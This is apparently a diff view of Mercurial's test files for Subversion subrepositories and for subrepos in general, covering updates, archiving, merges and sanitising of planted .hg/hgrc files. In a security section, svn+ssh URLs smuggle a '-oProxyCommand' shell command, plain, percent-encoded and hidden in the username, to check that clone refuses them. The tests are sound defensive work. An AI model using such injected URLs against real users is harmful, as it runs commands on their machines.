391 $ svnversion
391 $ svnversion
392 3
392 3
393 $ cd ..
393 $ cd ..
394
394
395 Test subrepo already at intended revision:
395 Test subrepo already at intended revision:
396 $ cd s
396 $ cd s
397 $ svn update -qr 2
397 $ svn update -qr 2
398 $ cd ..
398 $ cd ..
399 $ hg update 1
399 $ hg update 1
400 subrepository s diverged (local revision: 3, remote revision: 2)
400 subrepository s diverged (local revision: 3, remote revision: 2)
401 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
401 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
402 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
402 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
403 $ hg id -n
403 $ hg id -n
404 1+
404 1+
405 $ cd s
405 $ cd s
406 $ svnversion
406 $ svnversion
407 2
407 2
408 $ cd ..
408 $ cd ..
409
409
410 Test case where subversion would fail to update the subrepo because there
410 Test case where subversion would fail to update the subrepo because there
411 are unknown directories being replaced by tracked ones (happens with rebase).
411 are unknown directories being replaced by tracked ones (happens with rebase).
412
412
413 $ cd "$WCROOT/src"
413 $ cd "$WCROOT/src"
414 $ mkdir dir
414 $ mkdir dir
415 $ echo epsilon.py > dir/epsilon.py
415 $ echo epsilon.py > dir/epsilon.py
416 $ svn add dir
416 $ svn add dir
417 A dir
417 A dir
418 A dir/epsilon.py (glob)
418 A dir/epsilon.py (glob)
419 $ svn ci -qm 'Add dir/epsilon.py'
419 $ svn ci -qm 'Add dir/epsilon.py'
420 $ cd ../..
420 $ cd ../..
421 $ hg init rebaserepo
421 $ hg init rebaserepo
422 $ cd rebaserepo
422 $ cd rebaserepo
423 $ svn co -r5 --quiet "$SVNREPOURL"/src s
423 $ svn co -r5 --quiet "$SVNREPOURL"/src s
424 $ echo "s = [svn] $SVNREPOURL/src" >> .hgsub
424 $ echo "s = [svn] $SVNREPOURL/src" >> .hgsub
425 $ hg add .hgsub
425 $ hg add .hgsub
426 $ hg ci -m addsub
426 $ hg ci -m addsub
427 $ echo a > a
427 $ echo a > a
428 $ hg add .
428 $ hg add .
429 adding a
429 adding a
430 $ hg ci -m adda
430 $ hg ci -m adda
431 $ hg up 0
431 $ hg up 0
432 0 files updated, 0 files merged, 1 files removed, 0 files unresolved
432 0 files updated, 0 files merged, 1 files removed, 0 files unresolved
433 $ svn up -qr6 s
433 $ svn up -qr6 s
434 $ hg ci -m updatesub
434 $ hg ci -m updatesub
435 created new head
435 created new head
436 $ echo pyc > s/dir/epsilon.pyc
436 $ echo pyc > s/dir/epsilon.pyc
437 $ hg up 1
437 $ hg up 1
438 D *s/dir (glob)
438 D *s/dir (glob)
439
439
440 Fetching external item into '*s/externals'* (glob)
440 Fetching external item into '*s/externals'* (glob)
441 Checked out external at revision 1.
441 Checked out external at revision 1.
442
442
443 Checked out revision 5.
443 Checked out revision 5.
444 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
444 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
445 $ hg up -q 2
445 $ hg up -q 2
446
446
447 Modify one of the externals to point to a different path so we can
447 Modify one of the externals to point to a different path so we can
448 test having obstructions when switching branches on checkout:
448 test having obstructions when switching branches on checkout:
449 $ hg checkout tip
449 $ hg checkout tip
450 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
450 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
451 $ echo "obstruct = [svn] $SVNREPOURL/externals" >> .hgsub
451 $ echo "obstruct = [svn] $SVNREPOURL/externals" >> .hgsub
452 $ svn co -r5 --quiet "$SVNREPOURL"/externals obstruct
452 $ svn co -r5 --quiet "$SVNREPOURL"/externals obstruct
453 $ hg commit -m 'Start making obstructed working copy'
453 $ hg commit -m 'Start making obstructed working copy'
454 $ hg book other
454 $ hg book other
455 $ hg co -r 'p1(tip)'
455 $ hg co -r 'p1(tip)'
456 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
456 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
457 (leaving bookmark other)
457 (leaving bookmark other)
458 $ echo "obstruct = [svn] $SVNREPOURL/src" >> .hgsub
458 $ echo "obstruct = [svn] $SVNREPOURL/src" >> .hgsub
459 $ svn co -r5 --quiet "$SVNREPOURL"/src obstruct
459 $ svn co -r5 --quiet "$SVNREPOURL"/src obstruct
460 $ hg commit -m 'Other branch which will be obstructed'
460 $ hg commit -m 'Other branch which will be obstructed'
461 created new head
461 created new head
462
462
463 Switching back to the head where we have another path mapped to the
463 Switching back to the head where we have another path mapped to the
464 same subrepo should work if the subrepo is clean.
464 same subrepo should work if the subrepo is clean.
465 $ hg co other
465 $ hg co other
466 A *obstruct/other (glob)
466 A *obstruct/other (glob)
467 Checked out revision 1.
467 Checked out revision 1.
468 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
468 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
469 (activating bookmark other)
469 (activating bookmark other)
470
470
471 This is surprising, but is also correct based on the current code:
471 This is surprising, but is also correct based on the current code:
472 $ echo "updating should (maybe) fail" > obstruct/other
472 $ echo "updating should (maybe) fail" > obstruct/other
473 $ hg co tip
473 $ hg co tip
474 abort: uncommitted changes
474 abort: uncommitted changes
475 (commit or update --clean to discard changes)
475 (commit or update --clean to discard changes)
476 [255]
476 [255]
477
477
478 Point to a Subversion branch which has since been deleted and recreated
478 Point to a Subversion branch which has since been deleted and recreated
479 First, create that condition in the repository.
479 First, create that condition in the repository.
480
480
481 $ hg ci --subrepos -m cleanup | filter_svn_output
481 $ hg ci --subrepos -m cleanup | filter_svn_output
482 committing subrepository obstruct
482 committing subrepository obstruct
483 Sending obstruct/other (glob)
483 Sending obstruct/other (glob)
484 Committed revision 7.
484 Committed revision 7.
485 At revision 7.
485 At revision 7.
486 $ svn mkdir -qm "baseline" $SVNREPOURL/trunk
486 $ svn mkdir -qm "baseline" $SVNREPOURL/trunk
487 $ svn copy -qm "initial branch" $SVNREPOURL/trunk $SVNREPOURL/branch
487 $ svn copy -qm "initial branch" $SVNREPOURL/trunk $SVNREPOURL/branch
488 $ svn co --quiet "$SVNREPOURL"/branch tempwc
488 $ svn co --quiet "$SVNREPOURL"/branch tempwc
489 $ cd tempwc
489 $ cd tempwc
490 $ echo "something old" > somethingold
490 $ echo "something old" > somethingold
491 $ svn add somethingold
491 $ svn add somethingold
492 A somethingold
492 A somethingold
493 $ svn ci -qm 'Something old'
493 $ svn ci -qm 'Something old'
494 $ svn rm -qm "remove branch" $SVNREPOURL/branch
494 $ svn rm -qm "remove branch" $SVNREPOURL/branch
495 $ svn copy -qm "recreate branch" $SVNREPOURL/trunk $SVNREPOURL/branch
495 $ svn copy -qm "recreate branch" $SVNREPOURL/trunk $SVNREPOURL/branch
496 $ svn up -q
496 $ svn up -q
497 $ echo "something new" > somethingnew
497 $ echo "something new" > somethingnew
498 $ svn add somethingnew
498 $ svn add somethingnew
499 A somethingnew
499 A somethingnew
500 $ svn ci -qm 'Something new'
500 $ svn ci -qm 'Something new'
501 $ cd ..
501 $ cd ..
502 $ rm -rf tempwc
502 $ rm -rf tempwc
503 $ svn co "$SVNREPOURL/branch"@10 recreated
503 $ svn co "$SVNREPOURL/branch"@10 recreated
504 A recreated/somethingold (glob)
504 A recreated/somethingold (glob)
505 Checked out revision 10.
505 Checked out revision 10.
506 $ echo "recreated = [svn] $SVNREPOURL/branch" >> .hgsub
506 $ echo "recreated = [svn] $SVNREPOURL/branch" >> .hgsub
507 $ hg ci -m addsub
507 $ hg ci -m addsub
508 $ cd recreated
508 $ cd recreated
509 $ svn up -q
509 $ svn up -q
510 $ cd ..
510 $ cd ..
511 $ hg ci -m updatesub
511 $ hg ci -m updatesub
512 $ hg up -r-2
512 $ hg up -r-2
513 D *recreated/somethingnew (glob)
513 D *recreated/somethingnew (glob)
514 A *recreated/somethingold (glob)
514 A *recreated/somethingold (glob)
515 Checked out revision 10.
515 Checked out revision 10.
516 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
516 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
517 (leaving bookmark other)
517 (leaving bookmark other)
518 $ test -f recreated/somethingold
518 $ test -f recreated/somethingold
519
519
520 Test archive
520 Test archive
521
521
522 $ hg archive -S ../archive-all --debug --config progress.debug=true
522 $ hg archive -S ../archive-all --debug --config progress.debug=true
523 archiving: 0/2 files (0.00%)
523 archiving: 0/2 files (0.00%)
524 archiving: .hgsub 1/2 files (50.00%)
524 archiving: .hgsub 1/2 files (50.00%)
525 archiving: .hgsubstate 2/2 files (100.00%)
525 archiving: .hgsubstate 2/2 files (100.00%)
526 archiving (obstruct): 0/1 files (0.00%)
526 archiving (obstruct): 0/1 files (0.00%)
527 archiving (obstruct): 1/1 files (100.00%)
527 archiving (obstruct): 1/1 files (100.00%)
528 archiving (recreated): 0/1 files (0.00%)
528 archiving (recreated): 0/1 files (0.00%)
529 archiving (recreated): 1/1 files (100.00%)
529 archiving (recreated): 1/1 files (100.00%)
530 archiving (s): 0/2 files (0.00%)
530 archiving (s): 0/2 files (0.00%)
531 archiving (s): 1/2 files (50.00%)
531 archiving (s): 1/2 files (50.00%)
532 archiving (s): 2/2 files (100.00%)
532 archiving (s): 2/2 files (100.00%)
533
533
534 $ hg archive -S ../archive-exclude --debug --config progress.debug=true -X **old
534 $ hg archive -S ../archive-exclude --debug --config progress.debug=true -X **old
535 archiving: 0/2 files (0.00%)
535 archiving: 0/2 files (0.00%)
536 archiving: .hgsub 1/2 files (50.00%)
536 archiving: .hgsub 1/2 files (50.00%)
537 archiving: .hgsubstate 2/2 files (100.00%)
537 archiving: .hgsubstate 2/2 files (100.00%)
538 archiving (obstruct): 0/1 files (0.00%)
538 archiving (obstruct): 0/1 files (0.00%)
539 archiving (obstruct): 1/1 files (100.00%)
539 archiving (obstruct): 1/1 files (100.00%)
540 archiving (recreated): 0 files
540 archiving (recreated): 0 files
541 archiving (s): 0/2 files (0.00%)
541 archiving (s): 0/2 files (0.00%)
542 archiving (s): 1/2 files (50.00%)
542 archiving (s): 1/2 files (50.00%)
543 archiving (s): 2/2 files (100.00%)
543 archiving (s): 2/2 files (100.00%)
544 $ find ../archive-exclude | sort
544 $ find ../archive-exclude | sort
545 ../archive-exclude
545 ../archive-exclude
546 ../archive-exclude/.hg_archival.txt
546 ../archive-exclude/.hg_archival.txt
547 ../archive-exclude/.hgsub
547 ../archive-exclude/.hgsub
548 ../archive-exclude/.hgsubstate
548 ../archive-exclude/.hgsubstate
549 ../archive-exclude/obstruct
549 ../archive-exclude/obstruct
550 ../archive-exclude/obstruct/other
550 ../archive-exclude/obstruct/other
551 ../archive-exclude/s
551 ../archive-exclude/s
552 ../archive-exclude/s/alpha
552 ../archive-exclude/s/alpha
553 ../archive-exclude/s/dir
553 ../archive-exclude/s/dir
554 ../archive-exclude/s/dir/epsilon.py
554 ../archive-exclude/s/dir/epsilon.py
555
555
556 Test forgetting files, not implemented in svn subrepo, used to
556 Test forgetting files, not implemented in svn subrepo, used to
557 traceback
557 traceback
558
558
559 #if no-windows
559 #if no-windows
560 $ hg forget 'notafile*'
560 $ hg forget 'notafile*'
561 notafile*: No such file or directory
561 notafile*: No such file or directory
562 [1]
562 [1]
563 #else
563 #else
564 $ hg forget 'notafile'
564 $ hg forget 'notafile'
565 notafile: * (glob)
565 notafile: * (glob)
566 [1]
566 [1]
567 #endif
567 #endif
568
568
569 Test a subrepo referencing a just moved svn path. Last commit rev will
569 Test a subrepo referencing a just moved svn path. Last commit rev will
570 be different from the revision, and the path will be different as
570 be different from the revision, and the path will be different as
571 well.
571 well.
572
572
573 $ cd "$WCROOT"
573 $ cd "$WCROOT"
574 $ svn up > /dev/null
574 $ svn up > /dev/null
575 $ mkdir trunk/subdir branches
575 $ mkdir trunk/subdir branches
576 $ echo a > trunk/subdir/a
576 $ echo a > trunk/subdir/a
577 $ svn add trunk/subdir branches
577 $ svn add trunk/subdir branches
578 A trunk/subdir (glob)
578 A trunk/subdir (glob)
579 A trunk/subdir/a (glob)
579 A trunk/subdir/a (glob)
580 A branches
580 A branches
581 $ svn ci -qm addsubdir
581 $ svn ci -qm addsubdir
582 $ svn cp -qm branchtrunk $SVNREPOURL/trunk $SVNREPOURL/branches/somebranch
582 $ svn cp -qm branchtrunk $SVNREPOURL/trunk $SVNREPOURL/branches/somebranch
583 $ cd ..
583 $ cd ..
584
584
585 $ hg init repo2
585 $ hg init repo2
586 $ cd repo2
586 $ cd repo2
587 $ svn co $SVNREPOURL/branches/somebranch/subdir
587 $ svn co $SVNREPOURL/branches/somebranch/subdir
588 A subdir/a (glob)
588 A subdir/a (glob)
589 Checked out revision 15.
589 Checked out revision 15.
590 $ echo "subdir = [svn] $SVNREPOURL/branches/somebranch/subdir" > .hgsub
590 $ echo "subdir = [svn] $SVNREPOURL/branches/somebranch/subdir" > .hgsub
591 $ hg add .hgsub
591 $ hg add .hgsub
592 $ hg ci -m addsub
592 $ hg ci -m addsub
593 $ hg up null
593 $ hg up null
594 0 files updated, 0 files merged, 2 files removed, 0 files unresolved
594 0 files updated, 0 files merged, 2 files removed, 0 files unresolved
595 $ hg up
595 $ hg up
596 A *subdir/a (glob)
596 A *subdir/a (glob)
597 Checked out revision 15.
597 Checked out revision 15.
598 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
598 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
599 $ cd ..
599 $ cd ..
600
600
601 Test sanitizing ".hg/hgrc" in subrepo
601 Test sanitizing ".hg/hgrc" in subrepo
602
602
603 $ cd sub/t
603 $ cd sub/t
604 $ hg update -q -C tip
604 $ hg update -q -C tip
605 $ cd s
605 $ cd s
606 $ mkdir .hg
606 $ mkdir .hg
607 $ echo '.hg/hgrc in svn repo' > .hg/hgrc
607 $ echo '.hg/hgrc in svn repo' > .hg/hgrc
608 $ mkdir -p sub/.hg
608 $ mkdir -p sub/.hg
609 $ echo 'sub/.hg/hgrc in svn repo' > sub/.hg/hgrc
609 $ echo 'sub/.hg/hgrc in svn repo' > sub/.hg/hgrc
610 $ svn add .hg sub
610 $ svn add .hg sub
611 A .hg
611 A .hg
612 A .hg/hgrc (glob)
612 A .hg/hgrc (glob)
613 A sub
613 A sub
614 A sub/.hg (glob)
614 A sub/.hg (glob)
615 A sub/.hg/hgrc (glob)
615 A sub/.hg/hgrc (glob)
616 $ svn ci -qm 'add .hg/hgrc to be sanitized at hg update'
616 $ svn ci -qm 'add .hg/hgrc to be sanitized at hg update'
617 $ svn up -q
617 $ svn up -q
618 $ cd ..
618 $ cd ..
619 $ hg commit -S -m 'commit with svn revision including .hg/hgrc'
619 $ hg commit -S -m 'commit with svn revision including .hg/hgrc'
620 $ grep ' s$' .hgsubstate
620 $ grep ' s$' .hgsubstate
621 16 s
621 16 s
622 $ cd ..
622 $ cd ..
623
623
624 $ hg -R tc pull -u -q 2>&1 | sort
624 $ hg -R tc pull -u -q 2>&1 | sort
625 warning: removing potentially hostile 'hgrc' in '$TESTTMP/sub/tc/s/.hg' (glob)
625 warning: removing potentially hostile 'hgrc' in '$TESTTMP/sub/tc/s/.hg' (glob)
626 warning: removing potentially hostile 'hgrc' in '$TESTTMP/sub/tc/s/sub/.hg' (glob)
626 warning: removing potentially hostile 'hgrc' in '$TESTTMP/sub/tc/s/sub/.hg' (glob)
627 $ cd tc
627 $ cd tc
628 $ grep ' s$' .hgsubstate
628 $ grep ' s$' .hgsubstate
629 16 s
629 16 s
630 $ test -f s/.hg/hgrc
630 $ test -f s/.hg/hgrc
631 [1]
631 [1]
632 $ test -f s/sub/.hg/hgrc
632 $ test -f s/sub/.hg/hgrc
633 [1]
633 [1]
634
634
635 Test that sanitizing is omitted in meta data area:
635 Test that sanitizing is omitted in meta data area:
636
636
637 $ mkdir s/.svn/.hg
637 $ mkdir s/.svn/.hg
638 $ echo '.hg/hgrc in svn metadata area' > s/.svn/.hg/hgrc
638 $ echo '.hg/hgrc in svn metadata area' > s/.svn/.hg/hgrc
639 $ hg update -q -C '.^1'
639 $ hg update -q -C '.^1'
640
640
641 $ cd ../..
641 $ cd ../..
642
643 SEC: test for ssh exploit
644
645 $ hg init ssh-vuln
646 $ cd ssh-vuln
647 $ echo "s = [svn]$SVNREPOURL/src" >> .hgsub
648 $ svn co --quiet "$SVNREPOURL"/src s
649 $ hg add .hgsub
650 $ hg ci -m1
651 $ echo "s = [svn]svn+ssh://-oProxyCommand=touch%20owned%20nested" > .hgsub
652 $ hg ci -m2
653 $ cd ..
654 $ hg clone ssh-vuln ssh-vuln-clone
655 updating to branch default
656 abort: potentially unsafe url: 'svn+ssh://-oProxyCommand=touch owned nested' (in subrepository "s")
657 [255]
658
659 also check that a percent encoded '-' (%2D) doesn't work
660
661 $ cd ssh-vuln
662 $ echo "s = [svn]svn+ssh://%2DoProxyCommand=touch%20owned%20nested" > .hgsub
663 $ hg ci -m3
664 $ cd ..
665 $ rm -r ssh-vuln-clone
666 $ hg clone ssh-vuln ssh-vuln-clone
667 updating to branch default
668 abort: potentially unsafe url: 'svn+ssh://-oProxyCommand=touch owned nested' (in subrepository "s")
669 [255]
670
671 also check that hiding the attack in the username doesn't work:
672
673 $ cd ssh-vuln
674 $ echo "s = [svn]svn+ssh://%2DoProxyCommand=touch%20owned%20foo@example.com/nested" > .hgsub
675 $ hg ci -m3
676 $ cd ..
677 $ rm -r ssh-vuln-clone
678 $ hg clone ssh-vuln ssh-vuln-clone
679 updating to branch default
680 abort: potentially unsafe url: 'svn+ssh://-oProxyCommand=touch owned foo@example.com/nested' (in subrepository "s")
681 [255]
@@ -1,1791 +1,1865 b''
1 Let commit recurse into subrepos by default to match pre-2.0 behavior:
1 Let commit recurse into subrepos by default to match pre-2.0 behavior:
2
2
3 $ echo "[ui]" >> $HGRCPATH
3 $ echo "[ui]" >> $HGRCPATH
4 $ echo "commitsubrepos = Yes" >> $HGRCPATH
4 $ echo "commitsubrepos = Yes" >> $HGRCPATH
5
5
6 $ hg init t
6 $ hg init t
7 $ cd t
7 $ cd t
8
8
9 first revision, no sub
9 first revision, no sub
10
10
11 $ echo a > a
11 $ echo a > a
12 $ hg ci -Am0
12 $ hg ci -Am0
13 adding a
13 adding a
14
14
15 add first sub
15 add first sub
16
16
17 $ echo s = s > .hgsub
17 $ echo s = s > .hgsub
18 $ hg add .hgsub
18 $ hg add .hgsub
19 $ hg init s
19 $ hg init s
20 $ echo a > s/a
20 $ echo a > s/a
21
21
22 Issue2232: committing a subrepo without .hgsub
22 Issue2232: committing a subrepo without .hgsub
23
23
24 $ hg ci -mbad s
24 $ hg ci -mbad s
25 abort: can't commit subrepos without .hgsub
25 abort: can't commit subrepos without .hgsub
26 [255]
26 [255]
27
27
28 $ hg -R s add s/a
28 $ hg -R s add s/a
29 $ hg files -S
29 $ hg files -S
30 .hgsub
30 .hgsub
31 a
31 a
32 s/a (glob)
32 s/a (glob)
33
33
34 $ hg -R s ci -Ams0
34 $ hg -R s ci -Ams0
35 $ hg sum
35 $ hg sum
36 parent: 0:f7b1eb17ad24 tip
36 parent: 0:f7b1eb17ad24 tip
37 0
37 0
38 branch: default
38 branch: default
39 commit: 1 added, 1 subrepos
39 commit: 1 added, 1 subrepos
40 update: (current)
40 update: (current)
41 phases: 1 draft
41 phases: 1 draft
42 $ hg ci -m1
42 $ hg ci -m1
43
43
44 test handling .hgsubstate "added" explicitly.
44 test handling .hgsubstate "added" explicitly.
45
45
46 $ hg parents --template '{node}\n{files}\n'
46 $ hg parents --template '{node}\n{files}\n'
47 7cf8cfea66e410e8e3336508dfeec07b3192de51
47 7cf8cfea66e410e8e3336508dfeec07b3192de51
48 .hgsub .hgsubstate
48 .hgsub .hgsubstate
49 $ hg rollback -q
49 $ hg rollback -q
50 $ hg add .hgsubstate
50 $ hg add .hgsubstate
51 $ hg ci -m1
51 $ hg ci -m1
52 $ hg parents --template '{node}\n{files}\n'
52 $ hg parents --template '{node}\n{files}\n'
53 7cf8cfea66e410e8e3336508dfeec07b3192de51
53 7cf8cfea66e410e8e3336508dfeec07b3192de51
54 .hgsub .hgsubstate
54 .hgsub .hgsubstate
55
55
56 Subrepopath which overlaps with filepath, does not change warnings in remove()
56 Subrepopath which overlaps with filepath, does not change warnings in remove()
57
57
58 $ mkdir snot
58 $ mkdir snot
59 $ touch snot/file
59 $ touch snot/file
60 $ hg remove -S snot/file
60 $ hg remove -S snot/file
61 not removing snot/file: file is untracked (glob)
61 not removing snot/file: file is untracked (glob)
62 [1]
62 [1]
63 $ hg cat snot/filenot
63 $ hg cat snot/filenot
64 snot/filenot: no such file in rev 7cf8cfea66e4 (glob)
64 snot/filenot: no such file in rev 7cf8cfea66e4 (glob)
65 [1]
65 [1]
66 $ rm -r snot
66 $ rm -r snot
67
67
68 Revert subrepo and test subrepo fileset keyword:
68 Revert subrepo and test subrepo fileset keyword:
69
69
70 $ echo b > s/a
70 $ echo b > s/a
71 $ hg revert --dry-run "set:subrepo('glob:s*')"
71 $ hg revert --dry-run "set:subrepo('glob:s*')"
72 reverting subrepo s
72 reverting subrepo s
73 reverting s/a (glob)
73 reverting s/a (glob)
74 $ cat s/a
74 $ cat s/a
75 b
75 b
76 $ hg revert "set:subrepo('glob:s*')"
76 $ hg revert "set:subrepo('glob:s*')"
77 reverting subrepo s
77 reverting subrepo s
78 reverting s/a (glob)
78 reverting s/a (glob)
79 $ cat s/a
79 $ cat s/a
80 a
80 a
81 $ rm s/a.orig
81 $ rm s/a.orig
82
82
83 Revert subrepo with no backup. The "reverting s/a" line is gone since
83 Revert subrepo with no backup. The "reverting s/a" line is gone since
84 we're really running 'hg update' in the subrepo:
84 we're really running 'hg update' in the subrepo:
85
85
86 $ echo b > s/a
86 $ echo b > s/a
87 $ hg revert --no-backup s
87 $ hg revert --no-backup s
88 reverting subrepo s
88 reverting subrepo s
89
89
90 Issue2022: update -C
90 Issue2022: update -C
91
91
92 $ echo b > s/a
92 $ echo b > s/a
93 $ hg sum
93 $ hg sum
94 parent: 1:7cf8cfea66e4 tip
94 parent: 1:7cf8cfea66e4 tip
95 1
95 1
96 branch: default
96 branch: default
97 commit: 1 subrepos
97 commit: 1 subrepos
98 update: (current)
98 update: (current)
99 phases: 2 draft
99 phases: 2 draft
100 $ hg co -C 1
100 $ hg co -C 1
101 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
101 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
102 $ hg sum
102 $ hg sum
103 parent: 1:7cf8cfea66e4 tip
103 parent: 1:7cf8cfea66e4 tip
104 1
104 1
105 branch: default
105 branch: default
106 commit: (clean)
106 commit: (clean)
107 update: (current)
107 update: (current)
108 phases: 2 draft
108 phases: 2 draft
109
109
110 commands that require a clean repo should respect subrepos
110 commands that require a clean repo should respect subrepos
111
111
112 $ echo b >> s/a
112 $ echo b >> s/a
113 $ hg backout tip
113 $ hg backout tip
114 abort: uncommitted changes in subrepository "s"
114 abort: uncommitted changes in subrepository "s"
115 [255]
115 [255]
116 $ hg revert -C -R s s/a
116 $ hg revert -C -R s s/a
117
117
118 add sub sub
118 add sub sub
119
119
120 $ echo ss = ss > s/.hgsub
120 $ echo ss = ss > s/.hgsub
121 $ hg init s/ss
121 $ hg init s/ss
122 $ echo a > s/ss/a
122 $ echo a > s/ss/a
123 $ hg -R s add s/.hgsub
123 $ hg -R s add s/.hgsub
124 $ hg -R s/ss add s/ss/a
124 $ hg -R s/ss add s/ss/a
125 $ hg sum
125 $ hg sum
126 parent: 1:7cf8cfea66e4 tip
126 parent: 1:7cf8cfea66e4 tip
127 1
127 1
128 branch: default
128 branch: default
129 commit: 1 subrepos
129 commit: 1 subrepos
130 update: (current)
130 update: (current)
131 phases: 2 draft
131 phases: 2 draft
132 $ hg ci -m2
132 $ hg ci -m2
133 committing subrepository s
133 committing subrepository s
134 committing subrepository s/ss (glob)
134 committing subrepository s/ss (glob)
135 $ hg sum
135 $ hg sum
136 parent: 2:df30734270ae tip
136 parent: 2:df30734270ae tip
137 2
137 2
138 branch: default
138 branch: default
139 commit: (clean)
139 commit: (clean)
140 update: (current)
140 update: (current)
141 phases: 3 draft
141 phases: 3 draft
142
142
143 test handling .hgsubstate "modified" explicitly.
143 test handling .hgsubstate "modified" explicitly.
144
144
145 $ hg parents --template '{node}\n{files}\n'
145 $ hg parents --template '{node}\n{files}\n'
146 df30734270ae757feb35e643b7018e818e78a9aa
146 df30734270ae757feb35e643b7018e818e78a9aa
147 .hgsubstate
147 .hgsubstate
148 $ hg rollback -q
148 $ hg rollback -q
149 $ hg status -A .hgsubstate
149 $ hg status -A .hgsubstate
150 M .hgsubstate
150 M .hgsubstate
151 $ hg ci -m2
151 $ hg ci -m2
152 $ hg parents --template '{node}\n{files}\n'
152 $ hg parents --template '{node}\n{files}\n'
153 df30734270ae757feb35e643b7018e818e78a9aa
153 df30734270ae757feb35e643b7018e818e78a9aa
154 .hgsubstate
154 .hgsubstate
155
155
156 bump sub rev (and check it is ignored by ui.commitsubrepos)
156 bump sub rev (and check it is ignored by ui.commitsubrepos)
157
157
158 $ echo b > s/a
158 $ echo b > s/a
159 $ hg -R s ci -ms1
159 $ hg -R s ci -ms1
160 $ hg --config ui.commitsubrepos=no ci -m3
160 $ hg --config ui.commitsubrepos=no ci -m3
161
161
162 leave sub dirty (and check ui.commitsubrepos=no aborts the commit)
162 leave sub dirty (and check ui.commitsubrepos=no aborts the commit)
163
163
164 $ echo c > s/a
164 $ echo c > s/a
165 $ hg --config ui.commitsubrepos=no ci -m4
165 $ hg --config ui.commitsubrepos=no ci -m4
166 abort: uncommitted changes in subrepository "s"
166 abort: uncommitted changes in subrepository "s"
167 (use --subrepos for recursive commit)
167 (use --subrepos for recursive commit)
168 [255]
168 [255]
169 $ hg id
169 $ hg id
170 f6affe3fbfaa+ tip
170 f6affe3fbfaa+ tip
171 $ hg -R s ci -mc
171 $ hg -R s ci -mc
172 $ hg id
172 $ hg id
173 f6affe3fbfaa+ tip
173 f6affe3fbfaa+ tip
174 $ echo d > s/a
174 $ echo d > s/a
175 $ hg ci -m4
175 $ hg ci -m4
176 committing subrepository s
176 committing subrepository s
177 $ hg tip -R s
177 $ hg tip -R s
178 changeset: 4:02dcf1d70411
178 changeset: 4:02dcf1d70411
179 tag: tip
179 tag: tip
180 user: test
180 user: test
181 date: Thu Jan 01 00:00:00 1970 +0000
181 date: Thu Jan 01 00:00:00 1970 +0000
182 summary: 4
182 summary: 4
183
183
184
184
185 check caching
185 check caching
186
186
187 $ hg co 0
187 $ hg co 0
188 0 files updated, 0 files merged, 2 files removed, 0 files unresolved
188 0 files updated, 0 files merged, 2 files removed, 0 files unresolved
189 $ hg debugsub
189 $ hg debugsub
190
190
191 restore
191 restore
192
192
193 $ hg co
193 $ hg co
194 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
194 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
195 $ hg debugsub
195 $ hg debugsub
196 path s
196 path s
197 source s
197 source s
198 revision 02dcf1d704118aee3ee306ccfa1910850d5b05ef
198 revision 02dcf1d704118aee3ee306ccfa1910850d5b05ef
199
199
200 new branch for merge tests
200 new branch for merge tests
201
201
202 $ hg co 1
202 $ hg co 1
203 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
203 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
204 $ echo t = t >> .hgsub
204 $ echo t = t >> .hgsub
205 $ hg init t
205 $ hg init t
206 $ echo t > t/t
206 $ echo t > t/t
207 $ hg -R t add t
207 $ hg -R t add t
208 adding t/t (glob)
208 adding t/t (glob)
209
209
210 5
210 5
211
211
212 $ hg ci -m5 # add sub
212 $ hg ci -m5 # add sub
213 committing subrepository t
213 committing subrepository t
214 created new head
214 created new head
215 $ echo t2 > t/t
215 $ echo t2 > t/t
216
216
217 6
217 6
218
218
219 $ hg st -R s
219 $ hg st -R s
220 $ hg ci -m6 # change sub
220 $ hg ci -m6 # change sub
221 committing subrepository t
221 committing subrepository t
222 $ hg debugsub
222 $ hg debugsub
223 path s
223 path s
224 source s
224 source s
225 revision e4ece1bf43360ddc8f6a96432201a37b7cd27ae4
225 revision e4ece1bf43360ddc8f6a96432201a37b7cd27ae4
226 path t
226 path t
227 source t
227 source t
228 revision 6747d179aa9a688023c4b0cad32e4c92bb7f34ad
228 revision 6747d179aa9a688023c4b0cad32e4c92bb7f34ad
229 $ echo t3 > t/t
229 $ echo t3 > t/t
230
230
231 7
231 7
232
232
233 $ hg ci -m7 # change sub again for conflict test
233 $ hg ci -m7 # change sub again for conflict test
234 committing subrepository t
234 committing subrepository t
235 $ hg rm .hgsub
235 $ hg rm .hgsub
236
236
237 8
237 8
238
238
239 $ hg ci -m8 # remove sub
239 $ hg ci -m8 # remove sub
240
240
241 test handling .hgsubstate "removed" explicitly.
241 test handling .hgsubstate "removed" explicitly.
242
242
243 $ hg parents --template '{node}\n{files}\n'
243 $ hg parents --template '{node}\n{files}\n'
244 96615c1dad2dc8e3796d7332c77ce69156f7b78e
244 96615c1dad2dc8e3796d7332c77ce69156f7b78e
245 .hgsub .hgsubstate
245 .hgsub .hgsubstate
246 $ hg rollback -q
246 $ hg rollback -q
247 $ hg remove .hgsubstate
247 $ hg remove .hgsubstate
248 $ hg ci -m8
248 $ hg ci -m8
249 $ hg parents --template '{node}\n{files}\n'
249 $ hg parents --template '{node}\n{files}\n'
250 96615c1dad2dc8e3796d7332c77ce69156f7b78e
250 96615c1dad2dc8e3796d7332c77ce69156f7b78e
251 .hgsub .hgsubstate
251 .hgsub .hgsubstate
252
252
253 merge tests
253 merge tests
254
254
255 $ hg co -C 3
255 $ hg co -C 3
256 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
256 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
257 $ hg merge 5 # test adding
